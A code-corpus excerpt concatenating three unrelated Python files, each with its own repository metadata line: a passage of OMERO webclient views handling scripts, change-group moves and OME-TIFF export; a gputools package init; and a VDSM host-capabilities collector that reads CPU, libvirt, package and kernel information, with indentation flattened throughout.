kwargs['viewport_server'] = kwargs['viewport_server'].rstrip('/')
return webgateway_views.full_viewer(request, iid, **kwargs)
##############################################################################
# scripting service....
@login_required()
@render_response()
def list_scripts(request, conn=None, **kwargs):
""" List the available scripts - Just officical scripts for now """
scriptService = conn.getScriptService()
scripts = scriptService.getScripts()
# group scripts into 'folders' (path), named by parent folder name
scriptMenu = {}
scripts_to_ignore = request.session.get('server_settings') \
.get('scripts_to_ignore').split(",")
for s in scripts:
scriptId = s.id.val
path = s.path.val
name = s.name.val
fullpath = os.path.join(path, name)
if fullpath in scripts_to_ignore:
logger.info('Ignoring script %r' % fullpath)
continue
# We want to build a hierarchical <ul> <li> structure
# Each <ul> is a {}, each <li> is either a script 'name': <id> or
# directory 'name': {ul}
ul = scriptMenu
dirs = fullpath.split(os.path.sep)
for l, d in enumerate(dirs):
if len(d) == 0:
continue
if d not in ul:
# if last component in path:
if l+1 == len(dirs):
ul[d] = scriptId
else:
ul[d] = {}
ul = ul[d]
# convert <ul> maps into lists and sort
def ul_to_list(ul):
dir_list = []
for name, value in ul.items():
if isinstance(value, dict):
# value is a directory
dir_list.append({'name': name, 'ul': ul_to_list(value)})
else:
dir_list.append({'name': name, 'id': value})
dir_list.sort(key=lambda x: x['name'].lower())
return dir_list
scriptList = ul_to_list(scriptMenu)
# If we have a single top-level directory, we can skip it
if len(scriptList) == 1:
scriptList = scriptList[0]['ul']
return scriptList
@login_required()
@render_response()
def script_ui(request, scriptId, conn=None, **kwargs):
"""
Generates an html form for the parameters of a defined script.
"""
scriptService = conn.getScriptService()
try:
params = scriptService.getParams(long(scriptId))
except Exception, ex:
if ex.message.lower().startswith("no processor available"):
return {'template': 'webclient/scripts/no_processor.html',
'scriptId': scriptId}
raise ex
if params is None:
return HttpResponse()
paramData = {}
paramData["id"] = long(scriptId)
paramData["name"] = params.name.replace("_", " ")
paramData["description"] = params.description
paramData["authors"] = ", ".join([a for a in params.authors])
paramData["contact"] = params.contact
paramData["version"] = params.version
paramData["institutions"] = ", ".join([i for i in params.institutions])
inputs = [] # use a list so we can sort by 'grouping'
Data_TypeParam = None
IDsParam = None
for key, param in params.inputs.items():
i = {}
i["name"] = key.replace("_", " ")
i["key"] = key
if not param.optional:
i["required"] = True
i["description"] = param.description
if param.min:
i["min"] = str(param.min.getValue())
if param.max:
i["max"] = str(param.max.getValue())
if param.values:
i["options"] = [v.getValue() for v in param.values.getValue()]
if param.useDefault:
i["default"] = unwrap(param.prototype)
if isinstance(i["default"], omero.model.IObject):
i["default"] = None
pt = unwrap(param.prototype)
if pt.__class__.__name__ == 'dict':
i["map"] = True
elif pt.__class__.__name__ == 'list':
i["list"] = True
if "default" in i:
i["default"] = i["default"][0]
elif isinstance(pt, bool):
i["boolean"] = True
elif isinstance(pt, int) or isinstance(pt, long):
# will stop the user entering anything other than numbers.
i["number"] = "number"
elif isinstance(pt, float):
i["number"] = "float"
# if we got a value for this key in the page request, use this as
# default
if request.GET.get(key, None) is not None:
i["default"] = request.GET.get(key, None)
# E.g "" (string) or [0] (int list) or 0.0 (float)
i["prototype"] = unwrap(param.prototype)
i["grouping"] = param.grouping
inputs.append(i)
if key == "IDs":
IDsParam = i # remember these...
if key == "Data_Type":
Data_TypeParam = i
inputs.sort(key=lambda i: i["grouping"])
# if we have Data_Type param - use the request parameters to populate IDs
if (Data_TypeParam is not None and IDsParam is not None and
"options" in Data_TypeParam):
IDsParam["default"] = ""
for dtype in Data_TypeParam["options"]:
if request.GET.get(dtype, None) is not None:
Data_TypeParam["default"] = dtype
IDsParam["default"] = request.GET.get(dtype, "")
break # only use the first match
# if we've not found a match, check whether we have "Well" selected
if (len(IDsParam["default"]) == 0 and
request.GET.get("Well", None) is not None):
if "Image" in Data_TypeParam["options"]:
wellIds = [long(j) for j in request.GET.get(
"Well", None).split(",")]
wellIdx = 0
try:
wellIdx = int(request.GET.get("Index", 0))
except:
pass
wells = conn.getObjects("Well", wellIds)
imgIds = [str(w.getImage(wellIdx).getId()) for w in wells]
Data_TypeParam["default"] = "Image"
IDsParam["default"] = ",".join(imgIds)
# try to determine hierarchies in the groupings - ONLY handle 1 hierarchy
# level now (not recursive!)
for i in range(len(inputs)):
if len(inputs) <= i:
# we may remove items from inputs as we go - need to check
break
param = inputs[i]
grouping = param["grouping"] # E.g 03
param['children'] = list()
while len(inputs) > i+1:
nextGrp = inputs[i+1]["grouping"] # E.g. 03.1
if nextGrp.split(".")[0] == grouping:
param['children'].append(inputs[i+1])
inputs.pop(i+1)
else:
break
paramData["inputs"] = inputs
return {
'template': 'webclient/scripts/script_ui.html',
'paramData': paramData,
'scriptId': scriptId}
@login_required()
@render_response()
def figure_script(request, scriptName, conn=None, **kwargs):
"""
Show a UI for running figure scripts
"""
imageIds = request.GET.get('Image', None) # comma - delimited list
datasetIds = request.GET.get('Dataset', None)
if imageIds is None and datasetIds is None:
return HttpResponse("Need to specify /?Image=1,2 or /?Dataset=1,2")
def validateIds(dtype, ids):
ints = [int(oid) for oid in ids.split(",")]
validObjs = {}
for obj in conn.getObjects(dtype, ints):
validObjs[obj.id] = obj
filteredIds = [iid for iid in ints if iid in validObjs.keys()]
if len(filteredIds) == 0:
raise Http404("No %ss found with IDs %s" % (dtype, ids))
else:
# Now we can specify group context - All should be same group
gid = validObjs.values()[0].getDetails().group.id.val
conn.SERVICE_OPTS.setOmeroGroup(gid)
return filteredIds, validObjs
context = {}
if imageIds is not None:
imageIds, validImages = validateIds("Image", imageIds)
context['idString'] = ",".join([str(i) for i in imageIds])
context['dtype'] = "Image"
if datasetIds is not None:
datasetIds, validDatasets = validateIds("Dataset", datasetIds)
context['idString'] = ",".join([str(i) for i in datasetIds])
context['dtype'] = "Dataset"
if scriptName == "SplitView":
scriptPath = "/omero/figure_scripts/Split_View_Figure.py"
template = "webclient/scripts/split_view_figure.html"
# Lookup Tags & Datasets (for row labels)
imgDict = [] # A list of data about each image.
for iId in imageIds:
data = {'id': iId}
img = validImages[iId]
data['name'] = img.getName()
tags = [ann.getTextValue() for ann in img.listAnnotations()
if ann._obj.__class__ == omero.model.TagAnnotationI]
data['tags'] = tags
data['datasets'] = [d.getName() for d in img.listParents()]
imgDict.append(data)
# Use the first image as a reference
image = validImages[imageIds[0]]
context['imgDict'] = imgDict
context['image'] = image
context['channels'] = image.getChannels()
elif scriptName == "Thumbnail":
scriptPath = "/omero/figure_scripts/Thumbnail_Figure.py"
template = "webclient/scripts/thumbnail_figure.html"
def loadImageTags(imageIds):
tagLinks = conn.getAnnotationLinks("Image", parent_ids=imageIds)
linkMap = {} # group tags. {imageId: [tags]}
tagMap = {}
for iId in imageIds:
linkMap[iId] = []
for l in tagLinks:
c = l.getChild()
if c._obj.__class__ == omero.model.TagAnnotationI:
tagMap[c.id] = c
linkMap[l.getParent().id].append(c)
imageTags = []
for iId in imageIds:
imageTags.append({'id': iId, 'tags': linkMap[iId]})
tags = []
for tId, t in tagMap.items():
tags.append(t)
return imageTags, tags
thumbSets = [] # multiple collections of images
tags = []
figureName = "Thumbnail_Figure"
if datasetIds is not None:
for d in conn.getObjects("Dataset", datasetIds):
imgIds = [i.id for i in d.listChildren()]
imageTags, ts = loadImageTags(imgIds)
thumbSets.append({
'name': d.getName(), 'imageTags': imageTags})
tags.extend(ts)
figureName = thumbSets[0]['name']
else:
imageTags, ts = loadImageTags(imageIds)
thumbSets.append({'name': 'images', 'imageTags': imageTags})
tags.extend(ts)
parent = conn.getObject("Image", imageIds[0]).getParent()
figureName = parent.getName()
context['parent_id'] = parent.getId()
uniqueTagIds = set() # remove duplicates
uniqueTags = []
for t in tags:
if t.id not in uniqueTagIds:
uniqueTags.append(t)
uniqueTagIds.add(t.id)
uniqueTags.sort(key=lambda x: x.getTextValue().lower())
context['thumbSets'] = thumbSets
context['tags'] = uniqueTags
context['figureName'] = figureName.replace(" ", "_")
elif scriptName == "MakeMovie":
scriptPath = "/omero/export_scripts/Make_Movie.py"
template = "webclient/scripts/make_movie.html"
# expect to run on a single image at a time
image = conn.getObject("Image", imageIds[0])
# remove extension (if 3 chars or less)
movieName = image.getName().rsplit(".", 1)
if len(movieName) > 1 and len(movieName[1]) > 3:
movieName = ".".join(movieName)
else:
movieName = movieName[0]
# make sure name is not a path
context['movieName'] = os.path.basename(movieName)
chs = []
for c in image.getChannels():
chs.append({
'active': c.isActive(),
'color': c.getColor().getHtml(),
'label': c.getLabel()
})
context['channels'] = chs
context['sizeT'] = image.getSizeT()
context['sizeZ'] = image.getSizeZ()
scriptService = conn.getScriptService()
scriptId = scriptService.getScriptID(scriptPath)
if (scriptId < 0):
raise AttributeError("No script found for path '%s'" % scriptPath)
context['template'] = template
context['scriptId'] = scriptId
return context
@login_required()
@render_response()
def fileset_check(request, action, conn=None, **kwargs):
"""
Check whether Images / Datasets etc contain partial Multi-image filesets.
Used by chgrp or delete dialogs to test whether we can perform this
'action'.
"""
dtypeIds = {}
for dtype in ("Image", "Dataset", "Project"):
ids = request.GET.get(dtype, None)
if ids is not None:
dtypeIds[dtype] = [int(i) for i in ids.split(",")]
splitFilesets = conn.getContainerService().getImagesBySplitFilesets(
dtypeIds, None, conn.SERVICE_OPTS)
splits = []
for fsId, splitIds in splitFilesets.items():
splits.append({
'id': fsId,
'attempted_iids': splitIds[True],
'blocking_iids': splitIds[False]})
context = {"split_filesets": splits}
context['action'] = action
if action == 'chgrp':
context['action'] = 'move'
context['template'] = ("webclient/activities/"
"fileset_check_dialog_content.html")
return context
def getAllObjects(conn, project_ids, dataset_ids, image_ids, screen_ids,
plate_ids, experimenter_id):
"""
Given a list of containers and images, calculate all the descendants
and necessary siblings (for any filesets)
"""
# TODO Handle None inputs, maybe add defaults
params = omero.sys.ParametersI()
qs = conn.getQueryService()
project_ids = set(project_ids)
dataset_ids = set(dataset_ids)
image_ids = set(image_ids)
fileset_ids = set([])
plate_ids = set(plate_ids)
screen_ids = set(screen_ids)
# Get any datasets for projects
if project_ids:
params.map = {}
params.map['pids'] = rlist([rlong(x) for x in list(project_ids)])
q = '''
select pdlink.child.id
from ProjectDatasetLink pdlink
where pdlink.parent.id in (:pids)
'''
for e in qs.projection(q, params, conn.SERVICE_OPTS):
dataset_ids.add(e[0].val)
# Get any plates for screens
if screen_ids:
params.map = {}
params.map['sids'] = rlist([rlong(x) for x in screen_ids])
q = '''
select splink.child.id
from ScreenPlateLink splink
where splink.parent.id in (:sids)
'''
for e in qs.projection(q, params, conn.SERVICE_OPTS):
plate_ids.add(e[0].val)
# Get any images for datasets
if dataset_ids:
params.map = {}
params.map['dids'] = rlist([rlong(x) for x in dataset_ids])
q = '''
select dilink.child.id,
dilink.child.fileset.id
from DatasetImageLink dilink
where dilink.parent.id in (:dids)
'''
for e in qs.projection(q, params, conn.SERVICE_OPTS):
image_ids.add(e[0].val)
# Some images in Dataset may not have fileset
if e[1] is not None:
fileset_ids.add(e[1].val)
# Get any images for plates
# TODO Seemed no need to add the filesets for plates as it isn't possible
# to link it from outside of its plate. This may be true for the client,
# but it certainly isn't true for the model so maybe allow this to also get
# filesets
if plate_ids:
params.map = {}
params.map['plids'] = rlist([rlong(x) for x in plate_ids])
q = '''
select ws.image.id
from WellSample ws
join ws.plateAcquisition pa
where pa.plate.id in (:plids)
'''
for e in qs.projection(q, params, conn.SERVICE_OPTS):
image_ids.add(e[0].val)
# Get any extra images due to filesets
if fileset_ids:
params.map = {}
params.map['fsids'] = rlist([rlong(x) for x in fileset_ids])
q = '''
select image.id
from Image image
left outer join image.datasetLinks dilink
where image.fileset.id in (select fs.id
from Image im
join im.fileset fs
where fs.id in (:fsids)
group by fs.id
having count(im.id)>1)
'''
for e in qs.projection(q, params, conn.SERVICE_OPTS):
image_ids.add(e[0].val)
# Get any additional datasets that may need updating as their children have
# been snatched.
# TODO Need to differentiate which orphaned directories need refreshing
extra_dataset_ids = set([])
extra_orphaned = False
if image_ids:
params.map = {
'iids': rlist([rlong(x) for x in image_ids]),
}
exclude_datasets = ''
if dataset_ids:
params.map['dids'] = rlist([rlong(x) for x in dataset_ids])
# Make sure to allow parentless results as well as those
# that do not match a dataset being removed
exclude_datasets = '''
and (
dilink.parent.id not in (:dids)
or dilink.parent.id = null
)
'''
q = '''
select distinct dilink.parent.id
from Image image
left outer join image.datasetLinks dilink
where image.id in (:iids)
%s
and (select count(dilink2.child.id)
from DatasetImageLink dilink2
where dilink2.parent.id = dilink.parent.id
and dilink2.child.id not in (:iids)) = 0
''' % exclude_datasets
for e in qs.projection(q, params, conn.SERVICE_OPTS):
if e:
extra_dataset_ids.add(e[0].val)
else:
extra_orphaned = True
# Get any additional projects that may need updating as their children have
# been snatched. There is no need to check for orphans because if a dataset
# is being removed from somewhere else, it can not exist as an orphan.
extra_project_ids = set([])
if dataset_ids:
params.map = {
'dids': rlist([rlong(x) for x in dataset_ids])
}
exclude_projects = ''
if project_ids:
params.map['pids'] = rlist([rlong(x) for x in project_ids])
exclude_projects = 'and pdlink.parent.id not in (:pids)'
q = '''
select distinct pdlink.parent.id
from ProjectDatasetLink pdlink
where pdlink.child.id in (:dids)
%s
and (select count(pdlink2.child.id)
from ProjectDatasetLink pdlink2
where pdlink2.parent.id = pdlink.parent.id
and pdlink2.child.id not in (:dids)) = 0
''' % exclude_projects
for e in qs.projection(q, params, conn.SERVICE_OPTS):
extra_project_ids.add(e[0].val)
# We now have the complete list of objects that will change group
# We also have an additional list of datasets/projects that may have had
# snatched children and thus may need updating in the client if the
# dataset/project has gone from N to 0 children
result = {
# These objects are completely removed
'remove': {
'project': list(project_ids),
'dataset': list(dataset_ids),
'screen': list(screen_ids),
'plate': list(plate_ids),
'image': list(image_ids)
},
# These objects now have no children
'childless': {
'project': list(extra_project_ids),
'dataset': list(extra_dataset_ids),
'orphaned': extra_orphaned
}
}
return result
@require_POST
@login_required()
def chgrpDryRun(request, conn=None, **kwargs):
group_id = getIntOrDefault(request, 'group_id', None)
targetObjects = {}
dtypes = ["Project", "Dataset", "Image", "Screen", "Plate", "Fileset"]
for dtype in dtypes:
oids = request.POST.get(dtype, None)
if oids is not None:
obj_ids = [int(oid) for oid in oids.split(",")]
targetObjects[dtype] = obj_ids
handle = conn.chgrpDryRun(targetObjects, group_id)
jobId = str(handle)
return HttpResponse(jobId)
@login_required()
def chgrp(request, conn=None, **kwargs):
"""
Moves data to a new group, using the chgrp queue.
Handles submission of chgrp form: all data in POST.
Adds the callback handle to the request.session['callback']['jobId']
"""
# Get the target group_id
group_id = getIntOrDefault(request, 'group_id', None)
if group_id is None:
raise AttributeError("chgrp: No group_id specified")
group_id = long(group_id)
def getObjectOwnerId(r):
for t in ["Dataset", "Image", "Plate"]:
ids = r.POST.get(t, None)
if ids is not None:
for o in list(conn.getObjects(t, ids.split(","))):
return o.getDetails().owner.id.val
group = conn.getObject("ExperimenterGroup", group_id)
new_container_name = request.POST.get('new_container_name', None)
new_container_type = request.POST.get('new_container_type', None)
container_id = None
# Context must be set to owner of data, E.g. to create links.
ownerId = getObjectOwnerId(request)
conn.SERVICE_OPTS.setOmeroUser(ownerId)
if (new_container_name is not None and len(new_container_name) > 0 and
new_container_type is not None):
conn.SERVICE_OPTS.setOmeroGroup(group_id)
container_id = conn.createContainer(
new_container_type, new_container_name)
# No new container, check if target is specified
if container_id is None:
# E.g. "dataset-234"
target_id = request.POST.get('target_id', None)
container_id = (target_id is not None and target_id.split("-")[1] or
None)
dtypes = ["Project", "Dataset", "Image", "Screen", "Plate"]
for dtype in dtypes:
# Get all requested objects of this type
oids = request.POST.get(dtype, None)
if oids is not None:
obj_ids = [int(oid) for oid in oids.split(",")]
# TODO Doesn't the filesets only apply to images?
# if 'filesets' are specified, make sure we move ALL Fileset Images
fsIds = request.POST.getlist('fileset')
if len(fsIds) > 0:
# If a dataset is being moved and there is a split fileset
# then those images need to go somewhere in the new
if dtype == 'Dataset':
conn.regroupFilesets(dsIds=obj_ids, fsIds=fsIds)
else:
for fs in conn.getObjects("Fileset", fsIds):
obj_ids.extend([i.id for i in fs.copyImages()])
obj_ids = list(set(obj_ids)) # remove duplicates
logger.debug(
"chgrp to group:%s %s-%s" % (group_id, dtype, obj_ids))
handle = conn.chgrpObjects(dtype, obj_ids, group_id, container_id)
jobId = str(handle)
request.session['callback'][jobId] = {
'job_type': "chgrp",
'group': group.getName(),
'to_group_id': group_id,
'dtype': dtype,
'obj_ids': obj_ids,
'job_name': "Change group",
'start_time': datetime.datetime.now(),
'status': 'in progress'}
request.session.modified = True
# Update contains a list of images/containers that need to be
# updated.
project_ids = request.POST.get('Project', [])
dataset_ids = request.POST.get('Dataset', [])
image_ids = request.POST.get('Image', [])
screen_ids = request.POST.get('Screen', [])
plate_ids = request.POST.get('Plate', [])
if project_ids:
project_ids = [long(x) for x in project_ids.split(',')]
if dataset_ids:
dataset_ids = [long(x) for x in dataset_ids.split(',')]
if image_ids:
image_ids = [long(x) for x in image_ids.split(',')]
if screen_ids:
screen_ids = [long(x) for x in screen_ids.split(',')]
if plate_ids:
plate_ids = [long(x) for x in plate_ids.split(',')]
# TODO Change this user_id to be an experimenter_id in the request as it
# is possible that a user is chgrping data from another user so it is
# that users orphaned that will need updating. Or maybe all orphaned
# directories could potentially need updating?
# Create a list of objects that have been changed by this operation. This
# can be used by the client to visually update.
update = getAllObjects(conn, project_ids, dataset_ids, image_ids,
screen_ids, plate_ids,
request.session.get('user_id'))
# return HttpResponse("OK")
return JsonResponse({'update': update})
@login_required(setGroupContext=True)
def script_run(request, scriptId, conn=None, **kwargs):
"""
Runs a script using values in a POST
"""
scriptService = conn.getScriptService()
inputMap = {}
sId = long(scriptId)
try:
params = scriptService.getParams(sId)
except Exception, x:
if x.message and x.message.startswith("No processor available"):
# Delegate to run_script() for handling 'No processor available'
rsp = run_script(
request, conn, sId, inputMap, scriptName='Script')
return JsonResponse(rsp)
else:
raise
params = scriptService.getParams(sId)
scriptName = params.name.replace("_", " ").replace(".py", "")
logger.debug("Script: run with request.POST: %s" % request.POST)
for key, param in params.inputs.items():
prototype = param.prototype
pclass = prototype.__class__
# handle bool separately, since unchecked checkbox will not be in
# request.POST
if pclass == omero.rtypes.RBoolI:
value = key in request.POST
inputMap[key] = pclass(value)
continue
if pclass.__name__ == 'RMapI':
keyName = "%s_key0" % key
valueName = "%s_value0" % key
row = 0
paramMap = {}
while keyName in request.POST:
# the key and value don't have any data-type defined by
# scripts - just use string
k = str(request.POST[keyName])
v = request.POST[valueName]
if len(k) > 0 and len(v) > 0:
paramMap[str(k)] = v.encode('utf8')
row += 1
keyName = "%s_key%d" % (key, row)
valueName = "%s_value%d" % (key, row)
if len(paramMap) > 0:
inputMap[key] = wrap(paramMap)
continue
if key in request.POST:
if pclass == omero.rtypes.RListI:
values = request.POST.getlist(key)
if len(values) == 0:
continue
if len(values) == 1: # process comma-separated list
if len(values[0]) == 0:
continue
values = values[0].split(",")
# try to determine 'type' of values in our list
listClass = omero.rtypes.RStringI
l = prototype.val # list
# check if a value type has been set (first item of prototype
# list)
if len(l) > 0:
listClass = l[0].__class__
if listClass == int(1).__class__:
listClass = omero.rtypes.rint
if listClass == long(1).__class__:
listClass = omero.rtypes.rlong
# construct our list, using appropriate 'type'
valueList = []
for v in values:
try:
# RStringI() will encode any unicode
obj = listClass(v.strip())
except:
logger.debug("Invalid entry for '%s' : %s" % (key, v))
continue
if isinstance(obj, omero.model.IObject):
valueList.append(omero.rtypes.robject(obj))
else:
valueList.append(obj)
inputMap[key] = omero.rtypes.rlist(valueList)
# Handle other rtypes: String, Long, Int etc.
else:
value = request.POST[key]
if len(value) == 0:
continue
try:
inputMap[key] = pclass(value)
except:
logger.debug("Invalid entry for '%s' : %s" % (key, value))
continue
# If we have objects specified via 'IDs' and 'DataType', try to pick
# correct group
if 'IDs' in inputMap.keys() and 'Data_Type' in inputMap.keys():
gid = conn.SERVICE_OPTS.getOmeroGroup()
conn.SERVICE_OPTS.setOmeroGroup('-1')
try:
firstObj = conn.getObject(
inputMap['Data_Type'].val, unwrap(inputMap['IDs'])[0])
newGid = firstObj.getDetails().group.id.val
conn.SERVICE_OPTS.setOmeroGroup(newGid)
except Exception, x:
logger.debug(traceback.format_exc())
# if inputMap values not as expected or firstObj is None
conn.SERVICE_OPTS.setOmeroGroup(gid)
try:
# Try/except in case inputs are not serializable, e.g. unicode
logger.debug("Running script %s with "
"params %s" % (scriptName, inputMap))
except:
pass
rsp = run_script(request, conn, sId, inputMap, scriptName)
return JsonResponse(rsp)
@require_POST
@login_required()
def ome_tiff_script(request, imageId, conn=None, **kwargs):
"""
Uses the scripting service (Batch Image Export script) to generate
OME-TIFF for an image and attach this as a file annotation to the image.
Script will show up in the 'Activities' for users to monitor and download
result etc.
"""
scriptService = conn.getScriptService()
sId = scriptService.getScriptID(
"/omero/export_scripts/Batch_Image_Export.py")
image = conn.getObject("Image", imageId)
if image is not None:
gid = image.getDetails().group.id.val
conn.SERVICE_OPTS.setOmeroGroup(gid)
imageIds = [long(imageId)]
inputMap = {'Data_Type': wrap('Image'), 'IDs': wrap(imageIds)}
inputMap['Format'] = wrap('OME-TIFF')
rsp = run_script(
request, conn, sId, inputMap, scriptName='Create OME-TIFF')
return JsonResponse(rsp)
def run_script(request, conn, sId, inputMap, scriptName='Script'):
"""
Starts running a script, adding details to the request.session so that it
shows up in the webclient Activities panel and results are available there
etc.
"""
request.session.modified = True
scriptService = conn.getScriptService()
try:
handle = scriptService.runScript(
sId, inputMap, None, conn.SERVICE_OPTS)
# E.g. ProcessCallback/4ab13b23-22c9-4b5f-9318-40f9a1acc4e9 -t:tcp -h 10.37.129.2 -p 53154:tcp -h 10.211.55.2 -p 53154:tcp -h 10.12.1.230 -p 53154 # noqa
jobId = str(handle)
status = 'in progress'
request.session['callback'][jobId] = {
'job_type': "script",
'job_name': scriptName,
'start_time': datetime.datetime.now(),
'status': status}
request.session.modified = True
except Exception, x:
jobId = str(time()) # E.g. 1312803670.6076391
if x.message and x.message.startswith("No processor available"):
# omero.ResourceError
logger.info(traceback.format_exc())
error = "No Processor Available"
status = 'no processor available'
message = "" # template displays message and link
else:
logger.error(traceback.format_exc())
error = traceback.format_exc()
status = 'failed'
message = x.message
# save the error to http session, for display in 'Activities' window
request.session['callback'][jobId] = {
'job_type': "script",
'job_name': scriptName,
'start_time': datetime.datetime.now(),
'status': status,
'Message': message,
'error': error}
return {'status': status, 'error': error}
return {'jobId': jobId, 'status': status}
@login_required()
@render_response()
def ome_tiff_info(request, imageId, conn=None, **kwargs):
"""
Query to see if we have an OME-TIFF attached to the image (assume only 1,
since Batch Image Export will delete old ones)
"""
# Any existing OME-TIFF will appear in list
links = list(conn.getAnnotationLinks(
"Image", [imageId], ns=omero.constants.namespaces.NSOMETIFF))
rv = {}
if len(links) > 0:
# use highest ID === most recent
links.sort(key=lambda x: x.getId(), reverse=True)
annlink = links[0]
created = annlink.creationEventDate()
annId = annlink.getChild().getId()
from omeroweb.webgateway.templatetags.common_filters import ago
download = reverse("download_annotation", args=[annId])
rv = {"created": str(created), "ago": ago(created), "id": annId,
"download": download}
return rv # will get returned as json by default
| dpwrussell/openmicroscopy | components/tools/OmeroWeb/omeroweb/webclient/views.py | Python | gpl-2.0 | 172,591 |
"""
[email protected]
"""
from __future__ import print_function, unicode_literals, absolute_import, division
from .ssim import ssim | maweigert/gputools | gputools/metrics/__init__.py | Python | bsd-3-clause | 134 |
#
# Copyright 2011 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Refer to the README and COPYING files for full details of the license
#
"""Collect host capabilities"""
import os
from xml.dom import minidom
import subprocess
import logging
import time
import struct
import socket
import itertools
import libvirt
from config import config
import libvirtconnection
import dsaversion
import netinfo
import hooks
import utils
import constants
import storage.hba
class OSName:
UNKNOWN = 'unknown'
OVIRT = 'RHEV Hypervisor'
RHEL = 'RHEL'
class CpuInfo(object):
def __init__(self):
"""Parse /proc/cpuinfo"""
self._info = {}
p = {}
for line in file('/proc/cpuinfo'):
if line.strip() == '':
p = {}
continue
key, value = map(str.strip, line.split(':', 1))
if key == 'processor':
self._info[value] = p
else:
p[key] = value
def cores(self):
return len(self._info)
def sockets(self):
phys_ids = [ p.get('physical id', '0') for p in self._info.values() ]
return len(set(phys_ids))
def flags(self):
return self._info.itervalues().next()['flags'].split()
def mhz(self):
return self._info.itervalues().next()['cpu MHz']
def model(self):
return self._info.itervalues().next()['model name']
@utils.memoized
def _getEmulatedMachines():
c = libvirtconnection.get()
caps = minidom.parseString(c.getCapabilities())
guestTag = caps.getElementsByTagName('guest')
# Guest element is missing if kvm modules are not loaded
if len(guestTag) == 0:
return []
guestTag = guestTag[0]
return [ m.firstChild.toxml() for m in guestTag.getElementsByTagName('machine') ]
@utils.memoized
def _getCompatibleCpuModels():
c = libvirtconnection.get()
cpu_map = minidom.parseString(
file('/usr/share/libvirt/cpu_map.xml').read())
allModels = [ m.getAttribute('name') for m
in cpu_map.getElementsByTagName('arch')[0].childNodes
if m.nodeName == 'model' ]
def compatible(model):
xml = '<cpu match="minimum"><model>%s</model></cpu>' % model
return c.compareCPU(xml, 0) in (
libvirt.VIR_CPU_COMPARE_SUPERSET,
libvirt.VIR_CPU_COMPARE_IDENTICAL)
return [ 'model_' + model for model
in allModels if compatible(model) ]
def _parseKeyVal(lines, delim='='):
d = {}
for line in lines:
kv = line.split(delim, 1)
if len(kv) != 2:
continue
k, v = map(str.strip, kv)
d[k] = v
return d
def _getIscsiIniName():
try:
return _parseKeyVal(
file('/etc/iscsi/initiatorname.iscsi') )['InitiatorName']
except:
logging.error('reporting empty InitiatorName', exc_info=True)
return ''
def getos():
if os.path.exists('/etc/rhev-hypervisor-release'):
return OSName.OVIRT
elif os.path.exists('/etc/redhat-release'):
return OSName.RHEL
else:
return OSName.UNKNOWN
__osversion = None
def osversion():
global __osversion
if __osversion is not None:
return __osversion
version = release = ''
osname = getos()
try:
if osname == OSName.OVIRT:
d = _parseKeyVal( file('/etc/default/version') )
version = d.get('VERSION', '')
release = d.get('RELEASE', '')
else:
p = subprocess.Popen([constants.EXT_RPM, '-qf', '--qf',
'%{VERSION} %{RELEASE}\n', '/etc/redhat-release'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=True)
out, err = p.communicate()
if p.returncode == 0:
version, release = out.splitlines()[-1].split()
except:
logging.error('failed to find version/release', exc_info=True)
__osversion = dict(release=release, version=version, name=osname)
return __osversion
def get():
caps = {}
caps['kvmEnabled'] = \
str(config.getboolean('vars', 'fake_kvm_support') or
os.path.exists('/dev/kvm')).lower()
cpuInfo = CpuInfo()
caps['cpuCores'] = str(cpuInfo.cores())
caps['cpuSockets'] = str(cpuInfo.sockets())
caps['cpuSpeed'] = cpuInfo.mhz()
if config.getboolean('vars', 'fake_kvm_support'):
caps['cpuModel'] = 'Intel(Fake) CPU'
flags = set(cpuInfo.flags() + ['vmx', 'sse2', 'nx'])
caps['cpuFlags'] = ','.join(flags) + 'model_486,model_pentium,' \
'model_pentium2,model_pentium3,model_pentiumpro,model_qemu32,' \
'model_coreduo,model_core2duo,model_n270,model_Conroe,' \
'model_Penryn,model_Nehalem,model_Opteron_G1'
else:
caps['cpuModel'] = cpuInfo.model()
caps['cpuFlags'] = ','.join(cpuInfo.flags() +
_getCompatibleCpuModels())
caps.update(dsaversion.version_info)
caps.update(netinfo.get())
try:
caps['hooks'] = hooks.installed()
except:
logging.debug('not reporting hooks', exc_info=True)
caps['operatingSystem'] = osversion()
caps['uuid'] = utils.getHostUUID()
caps['packages2'] = _getKeyPackages()
caps['emulatedMachines'] = _getEmulatedMachines()
caps['ISCSIInitiatorName'] = _getIscsiIniName()
caps['HBAInventory'] = storage.hba.HBAInventory()
caps['vmTypes'] = ['kvm']
caps['memSize'] = str(utils.readMemInfo()['MemTotal'] / 1024)
caps['reservedMem'] = str(
config.getint('vars', 'host_mem_reserve') +
config.getint('vars', 'extra_mem_reserve') )
caps['guestOverhead'] = config.get('vars', 'guest_ram_overhead')
return caps
def _getIfaceByIP(addr):
remote = struct.unpack('I', socket.inet_aton(addr))[0]
for line in itertools.islice(file('/proc/net/route'), 1, None):
iface, dest, gateway, flags, refcnt, use, metric, \
mask, mtu, window, irtt = line.split()
dest = int(dest, 16)
mask = int(mask, 16)
if remote & mask == dest & mask:
return iface
return '' # should never get here w/ default gw
def _getKeyPackages():
def kernelDict():
try:
ver, rel = file('/proc/sys/kernel/osrelease').read(). \
strip().split('-', 1)
except:
logging.error('kernel release not found', exc_info=True)
ver, rel = '0', '0'
try:
t = file('/proc/sys/kernel/version').read().split()[2:]
del t[4] # Delete timezone
t = time.mktime(time.strptime(' '.join(t)))
except:
logging.error('kernel build time not found', exc_info=True)
t = '0'
return dict(version=ver, release=rel, buildtime=t)
KEY_PACKAGES = ['qemu-kvm', 'qemu-img',
'vdsm', 'spice-server', 'libvirt']
pkgs = {'kernel': kernelDict()}
try:
for pkg in KEY_PACKAGES:
rc, out, err = utils.execCmd([constants.EXT_RPM, '-q', '--qf',
'%{NAME}\t%{VERSION}\t%{RELEASE}\t%{BUILDTIME}\n', pkg],
sudo=False)
if rc: continue
line = out[-1]
n, v, r, t = line.split()
pkgs[pkg] = dict(version=v, release=r, buildtime=t)
except:
logging.error('', exc_info=True)
return pkgs
